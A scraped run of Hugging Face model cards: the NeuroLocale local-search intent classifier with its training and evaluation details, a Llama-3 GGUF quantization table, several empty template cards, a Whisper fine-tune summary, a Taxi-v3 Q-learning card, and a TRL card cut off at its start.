- 🐜 Pest Control Service
- 🐾 Pet Grooming
- 🐶 Pet Store
- 💊 Pharmacy
- 📷 Photography Studio
- 🩺 Physiotherapist
- 💉 Piercing Shop
- 🚰 Plumbing Service
- 🚓 Police Station
- 📚 Public Library
- 🚻 Public Restroom
- 🍽️ Restaurant
- 🏠 Roofing Contractor
- 📦 Shipping Center
- 👞 Shoe Store
- 🏬 Shopping Mall
- ⛸️ Skating Rink
- 🧘 Spa
- 🏀 Sport Store
- 🏟️ Stadium
- 📜 Stationery Store
- 📦 Storage Facility
- 🏊 Swimming Pool
- 🕍 Synagogue
- ✂️ Tailor
- 🚗 Tire Shop
- 🗺️ Tourist Attraction
- 🧸 Toy Store
- 🚂 Train Station
- ✈️ Travel Agency
- 🏫 University
- 🍷 Wine Shop
- 🧘 Yoga Studio
- 🦒 Zoo
---
## Installation 🛠️
Get started with NeuroLocale:
```bash
pip install transformers torch pandas scikit-learn tqdm
```
- **Requirements** 📋: Python 3.8+, ~50MB storage for model and dependencies.
- **Optional** 🔧: CUDA-enabled GPU for faster training/inference.
- **Model Download** 📥: Grab the pre-trained model from [Hugging Face](https://huggingface.co/boltuix/NeuroLocale).
## Training the Model 🧠
NeuroLocale is trained using **NeuroBERT** for multi-class text classification. Here’s how to train it:
### Prerequisites
- Dataset in CSV format with `text` (query) and `label` (category) columns.
- Example dataset structure:
```csv
text,label
"Need help with taxes","accounting firm"
"Where’s the nearest airport?","airport"
...
```
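Before fine-tuning, the string labels in such a CSV are mapped to integer IDs. A minimal sketch using only the standard library (the two rows are the illustrative examples above; the real dataset is much larger):

```python
import csv
import io

# Tiny stand-in for the real training CSV
raw = '''text,label
"Need help with taxes","accounting firm"
"Where is the nearest airport?","airport"
'''

rows = list(csv.DictReader(io.StringIO(raw)))
labels = sorted({row["label"] for row in rows})           # stable, sorted label order
label2id = {label: i for i, label in enumerate(labels)}   # string label -> integer id
encoded = [(row["text"], label2id[row["label"]]) for row in rows]
print(encoded)
```

The same `label2id` mapping is what ends up in the model config as `id2label`/`label2id`, which is how the snippet below can recover the category names.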
# 🤖 Supported Categories from `boltuix/NeuroLocale`
This file shows how to extract the full list of intent labels supported by the `boltuix/NeuroLocale` model using Hugging Face Transformers.
---
## 🔧 How to List All Supported Categories
```python
from transformers import AutoModelForSequenceClassification
# 📥 Load the fine-tuned intent classification model
model = AutoModelForSequenceClassification.from_pretrained("boltuix/NeuroLocale")
# 🏷️ Extract the ID-to-label mapping dictionary
label_mapping = model.config.id2label
# 📋 Convert and sort all labels to a clean list
supported_labels = sorted(label_mapping.values())
# ✅ Print the supported categories
print("✅ Supported Categories:", supported_labels)
#✅ Output
#✅ Supported Categories: ['accounting firm', 'airport', 'amusement park', ...]
```
---
### Training Code
- 📍 Get training [Source Code](https://huggingface.co/boltuix/NeuroLocale/blob/main/colab_training_code.ipynb) 🌟
- 📍 Dataset (coming soon)
---
## Evaluation 📈
NeuroLocale was tested on **122 test cases**, achieving **94.26% accuracy** (115/122 correct). Below are sample results:
| Query | Expected Category | Predicted Category | Confidence | Status |
|-------------------------------------------------|--------------------|--------------------|------------|--------|
| How do I catch the early ride to the runway? | ✈️ Airport | ✈️ Airport | 0.997 | ✅ |
| Are the roller coasters still running today? | 🎢 Amusement Park | 🎢 Amusement Park | 0.997 | ✅ |
| Where can I see ocean creatures behind glass? | 🐠 Aquarium | 🐠 Aquarium | 1.000 | ✅ |
---
### Evaluation Metrics
| Metric | Value |
|-----------------|-----------------|
| Accuracy | 94.26% |
| F1 Score (Weighted) | ~0.94 (estimated) |
| Processing Time | <50ms per query |
*Note*: F1 score is estimated based on high accuracy. Test with your dataset for precise metrics.
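The headline accuracy is plain ratio arithmetic over the test set:

```python
# 115 correct predictions out of 122 test cases
correct, total = 115, 122
accuracy = correct / total
print(f"Accuracy: {accuracy:.2%}")  # Accuracy: 94.26%
```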
---
## Dataset Details 📊
- **Source**: Open-source datasets, augmented with custom queries (e.g., ChatGPT, Grok, or proprietary data).
- **Format**: CSV with `text` (query) and `label` (category) columns.
- **Categories**: 120+ (see [Supported Categories](#supported-categories)).
- **Size**: Varies based on dataset; model footprint ~50MB.
- **Preprocessing**: Handled via tokenization and label encoding (see [Training the Model](#training-the-model)).
---
## Use Cases 🌍
NeuroLocale powers a variety of applications:
- **Local Search Apps** 🗺️: Suggest 🐾 pet stores or 🩺 clinics based on queries like “My dog is sick.”
- **Chatbots** 🤖: Enhance customer service bots with context-aware local recommendations.
- **E-Commerce** 🛍️: Guide users to nearby 💼 accounting firms or 📚 bookstores.
- **Travel Apps** ✈️: Recommend 🏨 hotels or 🗺️ tourist attractions for travelers.
- **Healthcare** 🩺: Direct users to 🏥 hospitals or 💊 pharmacies for urgent needs.
- **Smart Assistants** 📱: Integrate with voice assistants for hands-free local search.
---
## Comparison to Other Solutions ⚖️
| Solution | Categories | Accuracy | NLP Strength | Open Source |
|-------------------|------------|----------|--------------|-------------|
| **NeuroLocale** | 120+ | 94.26% | Strong 🧠 | Yes ✅ |
| Google Maps API | ~100 | ~85% | Moderate | No ❌ |
| Yelp API | ~80 | ~80% | Weak | No ❌ |
| OpenStreetMap | Varies | Varies | Weak | Yes ✅ |
NeuroLocale excels with its **high accuracy**, **strong NLP**, and **open-source flexibility**. 🚀
---
## Source 🌱
- **Base Model**: NeuroBERT by [boltuix](https://huggingface.co/boltuix/NeuroBERT).
- **Data**: Open-source datasets, synthetic queries, and community contributions.
- **Mission**: Make local search intuitive and intent-driven for all.
---
## License 📜
**Open Source**: Free to use, modify, and distribute. See repository for details.
---
## Credits 🙌
- **Developed By**: [boltuix](https://huggingface.co/boltuix) 👨💻
- **Base Model**: NeuroBERT 🧠
- **Powered By**: Hugging Face 🤗, PyTorch 🔥, and open-source datasets 🌐
---
## Community & Support 🌐
Join the NeuroLocale community:
- 📍 Explore the [Hugging Face model page](https://huggingface.co/boltuix/NeuroLocale) 🌟
- 🛠️ Report issues or contribute at the [repository](https://huggingface.co/boltuix/NeuroLocale) 🔧
- 💬 Discuss on Hugging Face forums or submit pull requests 🗣️
- 📚 Learn more via [Hugging Face Transformers docs](https://huggingface.co/docs/transformers) 📖
Your feedback shapes NeuroLocale! 😊
---
## Last Updated 📅
**May 26, 2025** — Added 120+ category support, updated test accuracy, and enhanced documentation with emojis.
**[Get Started with NeuroLocale](https://huggingface.co/boltuix/NeuroLocale)** 🚀 |
amartyadas/example-model | amartyadas | 2025-06-09T11:03:25Z | 0 | 0 | null | [
"region:us"
] | null | 2025-06-09T10:55:20Z | # this is my model card
README
---
license: mit
---
|
RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf | RichardErkhov | 2025-06-09T10:59:48Z | 0 | 0 | null | [
"gguf",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-06-09T09:08:03Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llama3-8b_20kshotplusalpaca - GGUF
- Model creator: https://huggingface.co/CompassioninMachineLearning/
- Original model: https://huggingface.co/CompassioninMachineLearning/llama3-8b_20kshotplusalpaca/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llama3-8b_20kshotplusalpaca.Q2_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q2_K.gguf) | Q2_K | 2.96GB |
| [llama3-8b_20kshotplusalpaca.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [llama3-8b_20kshotplusalpaca.IQ3_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [llama3-8b_20kshotplusalpaca.IQ3_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [llama3-8b_20kshotplusalpaca.Q3_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K.gguf) | Q3_K | 3.74GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [llama3-8b_20kshotplusalpaca.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [llama3-8b_20kshotplusalpaca.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [llama3-8b_20kshotplusalpaca.Q4_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_0.gguf) | Q4_0 | 4.34GB |
| [llama3-8b_20kshotplusalpaca.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [llama3-8b_20kshotplusalpaca.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [llama3-8b_20kshotplusalpaca.Q4_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K.gguf) | Q4_K | 4.58GB |
| [llama3-8b_20kshotplusalpaca.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [llama3-8b_20kshotplusalpaca.Q4_1.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q4_1.gguf) | Q4_1 | 4.78GB |
| [llama3-8b_20kshotplusalpaca.Q5_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_0.gguf) | Q5_0 | 5.21GB |
| [llama3-8b_20kshotplusalpaca.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [llama3-8b_20kshotplusalpaca.Q5_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K.gguf) | Q5_K | 5.34GB |
| [llama3-8b_20kshotplusalpaca.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [llama3-8b_20kshotplusalpaca.Q5_1.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q5_1.gguf) | Q5_1 | 5.65GB |
| [llama3-8b_20kshotplusalpaca.Q6_K.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q6_K.gguf) | Q6_K | 6.14GB |
| [llama3-8b_20kshotplusalpaca.Q8_0.gguf](https://huggingface.co/RichardErkhov/CompassioninMachineLearning_-_llama3-8b_20kshotplusalpaca-gguf/blob/main/llama3-8b_20kshotplusalpaca.Q8_0.gguf) | Q8_0 | 7.95GB |
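As a quick sanity check on the table above, the effective bits per weight of a quant can be estimated from its file size. This is a rough figure that ignores GGUF metadata and any tensors kept at higher precision, and it assumes the usual ~8.03B parameter count for Llama-3-8B:

```python
def bits_per_weight(file_size_gb, n_params_billion):
    """Rough effective bits/weight: total file bits divided by parameter count."""
    return file_size_gb * 8 / n_params_billion

# e.g. the Q4_K_M file above at ~4.58 GB over ~8.03B parameters
print(round(bits_per_weight(4.58, 8.03), 2))  # → 4.56
```

The same arithmetic explains the spread in the table: Q2_K lands near 3 bits/weight while Q8_0 sits near 8, which is why file sizes range from ~3 GB to ~8 GB.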
Original model description:
---
library_name: transformers
tags:
- llama-factory
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
luyotw/openfun-ivod-whisper-large-v3-negotiation-10-32 | luyotw | 2025-06-09T10:47:25Z | 0 | 0 | null | [
"tensorboard",
"safetensors",
"whisper",
"region:us"
] | null | 2025-06-09T08:21:59Z |
# Fine-tuning Information
- Base model: `openai/whisper-large-v3`
- Number of audio clips: 27385
- Total audio duration: 15.06 hours
- Average clip length: 1.98 seconds
- GPU: `NVIDIA H100 PCIe` x 1
- Training time: 05:19:44
- Model size: 5.75 GB
- Training parameters:
  - batch size: 8
  - eval batch size: 4
  - gradient checkpointing: True
  - fp16: False
  - bf16: True
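The dataset statistics above are self-consistent, which is a quick check worth doing on any data card:

```python
clips = 27385
avg_seconds = 1.98

# total duration implied by clip count and average length
total_hours = clips * avg_seconds / 3600
print(round(total_hours, 2))  # → 15.06, matching the stated total
```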
---
# Model Card
|
AlexHung29629/FormoMouse123 | AlexHung29629 | 2025-06-09T10:47:04Z | 202 | 0 | transformers | [
"transformers",
"safetensors",
"llama4_text",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-04T13:28:26Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
b6Amine/Quantized_nf4 | b6Amine | 2025-06-09T10:40:14Z | 0 | 0 | null | [
"safetensors",
"qwen3",
"license:apache-2.0",
"4-bit",
"bitsandbytes",
"region:us"
] | null | 2025-06-09T10:31:04Z | ---
license: apache-2.0
---
|
liyj8682/laoli-mfd | liyj8682 | 2025-06-09T10:31:51Z | 0 | 0 | null | [
"gguf",
"qwen2",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T08:42:01Z | ---
license: apache-2.0
---
|
Anagha1/Taxi-assignment | Anagha1 | 2025-06-09T10:31:49Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T10:00:47Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: Taxi-assignment
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.56 +/- 2.71
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3**.
## Usage

```python
import gymnasium as gym  # or `import gym`, depending on your setup

# `load_from_hub` is the helper defined in the Hugging Face Deep RL course
# notebooks; it downloads and unpickles the saved Q-table dictionary.
model = load_from_hub(repo_id="Anagha1/Taxi-assignment", filename="q-learning.pkl")

# Don't forget to check if you need to add additional attributes (is_slippery=False etc)
env = gym.make(model["env_id"])
```
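Once the Q-table is loaded, acting with the trained agent is just a greedy argmax over the table row for the current state. A minimal pure-Python sketch (the actual table stored in `q-learning.pkl` is typically a NumPy array, but it indexes the same way):

```python
def greedy_action(q_table, state):
    """Pick the action with the highest Q-value for `state`."""
    row = q_table[state]
    return max(range(len(row)), key=row.__getitem__)

# toy 2-state, 3-action table for illustration
toy_q = [[0.0, 1.5, -0.2],
         [2.0, 0.1, 0.3]]
print(greedy_action(toy_q, 0))  # → 1
```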
|
Cusul/SFT_Stem_2 | Cusul | 2025-06-09T10:30:51Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T10:29:24Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
moxeeeem/aaa_proj | moxeeeem | 2025-06-09T10:28:33Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen2_5_vl",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T01:01:44Z | ---
base_model: unsloth/qwen2.5-vl-7b-instruct-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen2_5_vl
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** moxeeeem
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen2.5-vl-7b-instruct-bnb-4bit
This qwen2_5_vl model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
anasse15/MNLP_M3_rag_model_single_token | anasse15 | 2025-06-09T10:27:26Z | 19 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"unsloth",
"trl",
"sft",
"base_model:unsloth/Qwen3-0.6B-Base",
"base_model:finetune:unsloth/Qwen3-0.6B-Base",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-08T17:35:00Z | ---
base_model: unsloth/Qwen3-0.6B-Base
library_name: transformers
model_name: MNLP_M3_rag_model_single_token
tags:
- generated_from_trainer
- unsloth
- trl
- sft
licence: license
---
# Model Card for MNLP_M3_rag_model_single_token
This model is a fine-tuned version of [unsloth/Qwen3-0.6B-Base](https://huggingface.co/unsloth/Qwen3-0.6B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
